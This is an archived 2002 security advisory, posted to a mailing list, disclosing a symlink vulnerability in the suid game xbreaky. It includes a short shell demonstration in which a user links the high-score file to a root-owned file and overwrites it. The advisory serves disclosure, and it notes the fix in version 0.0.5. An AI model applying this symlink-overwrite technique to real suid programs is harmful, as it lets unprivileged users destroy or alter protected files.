OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Marco van Berkum (m.v.berkum_at_obit.nl)
Date: Thu Sep 12 2002 - 11:28:14 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----------------------------------------------------------------------
    Title: xbreaky symlink vulnerability
    Author: Marco van Berkum
    Classification: High risk
    Date: 12/09/2002
    Email: m.v.berkumobit.nl
    Company: OBIT
    Company site: http://www.obit.nl
    Personal website: http://ws.obit.nl
    -----------------------------------------------------------------------

    About xbreaky
    -------------
    xbreaky is a breakout game for X written by Dave Brul which can be downloaded
    from http://xbreaky.sourceforge.net. xbreaky is added to the OpenBSD ports tree,
    NetBSD tree and possibly others.

    Problem
    -------
    By default xbreaky is installed as suid and can be abused to overwrite any file
    on the filesystem, by any user.

    Vulnerable versions
    -------------------
    All versions prior to 0.0.5

    Exploit
    -------
    xbreaky uses $HOME/.breakyhighscores to write the highscores to, when
    $HOME/.breakyhighscores is symlinked to another file (*any* file) it simply
    overwrites it as root user.

    Example
    -------
    rootanimal:/home/marco# echo "bla" >rootfile
    rootanimal:/home/marco# chmod 600 rootfile
    rootanimal:/home/marco# exit
    logout
    marcoanimal:~$ ln -s rootfile .breakyhighscores
    marcoanimal:~$ xbreaky

    Now I play a game and set highscore as user "lol", then I exit the game.
    Its a nice game btw :)

    marcoanimal:~$ cat rootfile
    cat: rootfile: Permission denied
    marcoanimal:~$ su -
    Password:
    rootanimal:~# cat /home/marco/rootfile
    lol <- voila, our highscore user

    Author's response and solution
    ------------------------------
    The author corrected the problem and released xbreaky 0.0.5

    Credits
    -------
    Thanks to Dennis Oelkers for testing.

    --
    find / -user your -name base -exec chown us:us {}\;
     ----------------------------------------
    |    Marco van Berkum / MB17300-RIPE     |
    | m.v.berkumobit.nl / http://ws.obit.nl |
     ----------------------------------------